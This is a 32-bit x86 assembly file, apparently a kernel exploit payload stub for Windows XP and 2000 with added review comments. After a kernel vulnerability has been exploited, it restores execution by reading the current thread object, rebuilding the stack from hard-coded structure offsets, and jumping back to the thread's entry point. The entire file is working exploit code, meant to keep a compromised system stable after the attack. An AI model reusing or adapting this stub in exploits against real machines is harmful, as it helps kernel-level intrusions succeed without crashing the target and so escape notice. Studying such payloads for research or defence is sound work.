bits 32
;
; This recovery method works by restarting the calling thread at its entry
; point. This is most likely only going to be safe for vulnerabilities that
; occur in the context of a system worker thread without any locks being
; held. This recovery implementation is designed to work from the context of
; something that runs in a system worker thread.
;
; Register roles (as used by the code below):
;   ebx  offset scratch: 0x24 -> 0x124 -> 0x224, then thread + 0x224
;   edx  current thread object, read from fs:[0x124]
;   esp  rebuilt from the thread field at +0x18 minus a fixed displacement
;   eax  thread entry-point address, the final jmp target
; Clobbers: eax, ebx, edx, esp, flags. Nothing is saved or restored; the
; frame of the call chain that was executing is abandoned, which is why the
; "no locks held" caveat above matters.
; All structure offsets (0x18, 0x224/0x230, 0x124) and the stack displacements
; are hard-coded for the two OS generations handled below (winxp / win2k) and
; are not validated at run time. NOTE(review): on a build with a different
; layout the stub reads the wrong field and jumps to an arbitrary value --
; confirm the offsets against the target build before relying on it.
;
entry:
    push    byte 0x24                   ; ebx = 0x24 (imm8 is sign-extended, so bits 8..31 are clear)
    pop     ebx
    inc     bh                          ; ebx = 0x124; valid only because bh was zero above
    mov     edx, [fs:ebx]               ; edx = current thread (fs:[0x124]; presumably the
                                        ;   per-processor CurrentThread slot -- confirm)
    inc     bh                          ; ebx = 0x224
    mov     esp, [edx+0x18]             ; esp = thread field at +0x18 (presumably the thread's
                                        ;   initial/base kernel stack -- confirm)
    sub     esp, ebx                    ; esp -= 0x224
    add     ebx, edx                    ; ebx = thread + 0x224 (entry-point field on the winxp path)
    cmp     byte [0xffdf0270], 0x1      ; OS-generation check: byte in the fixed kernel mapping at
                                        ;   0xffdf0000 (presumably a version field of the shared
                                        ;   user/kernel data page -- confirm which one)
    jl      win2k                       ; NOTE(review): jl is a signed compare; a byte >= 0x80
                                        ;   would also take the win2k path
winxp:
    mov     eax, [ebx]                  ; eax = [thread + 0x224], entry point on XP
    sub     esp, byte 0x2c              ; esp = [thread + 0x18] - 0x250
    jmp     short call_start_address
win2k:
    mov     eax, [ebx+0xc]              ; eax = [thread + 0x230], entry point on 2000
    sub     esp, byte 0x30              ; esp = [thread + 0x18] - 0x254
call_start_address:
    ; sub sp, bx                        ; left commented out in the original; not assembled
    jmp     eax                         ; restart the thread at its entry point; never returns here